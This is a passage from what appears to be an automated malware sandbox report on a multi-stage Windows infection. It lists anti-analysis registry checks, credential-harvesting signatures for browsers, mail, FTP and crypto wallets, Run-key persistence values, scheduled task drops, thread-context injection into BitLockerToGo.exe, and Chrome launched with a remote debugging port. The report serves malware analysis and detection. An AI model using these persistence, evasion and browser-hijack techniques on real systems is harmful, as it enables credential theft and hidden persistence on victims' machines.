| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10036380101\3f8189a097.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10036380101\3f8189a097.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\eltqgcf\oamb.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10036420101\b59e2e872a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10036370101\545ca2177e.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10036390101\95fec32fd0.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10036400101\08a8bb090e.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\ProgramData\eltqgcf\oamb.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10036370101\545ca2177e.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10036380101\3f8189a097.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10036420101\b59e2e872a.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe | N/A |
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\quarantine\download.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9e28748818.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10035810101\\9e28748818.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10035820121\\am_no.cmd" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Checks installed software on the system
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10036370101\545ca2177e.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10036380101\3f8189a097.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10036390101\95fec32fd0.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10036400101\08a8bb090e.exe | N/A |
| N/A | N/A | C:\ProgramData\eltqgcf\oamb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10036420101\b59e2e872a.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 5212 set thread context of 3840 | N/A | C:\Users\Admin\AppData\Local\Temp\10036370101\545ca2177e.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 2236 set thread context of 4512 | N/A | C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe | C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe |
| PID 2720 set thread context of 3904 | N/A | C:\Users\Admin\AppData\Local\Temp\10036390101\95fec32fd0.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\rapes.job | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe | N/A |
| File created | C:\Windows\Tasks\Test Task17.job | C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10036380101\3f8189a097.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10036400101\08a8bb090e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\eltqgcf\oamb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10036430101\MCxU5Fj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\quarantine\download.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10036370101\545ca2177e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\TempNIKU2KFNSI0OSCJ5SNYFIAJYHYQOJDXS.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10036420101\b59e2e872a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10035810101\9e28748818.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10036390101\95fec32fd0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133850860752177191" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10035810101\9e28748818.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10035810101\9e28748818.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10035810101\9e28748818.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\quarantine\download.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\download.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff95bb7cc40,0x7ff95bb7cc4c,0x7ff95bb7cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2016,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2012 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1944,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2136 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1984,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2464 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3192,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3200 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3328,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3236 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4260,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4484 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4476,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4572 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4560,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4576 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4508,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4780 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3848,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4976 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4552,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4596 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5208,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4768 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5016,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5000 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4596,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5088 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
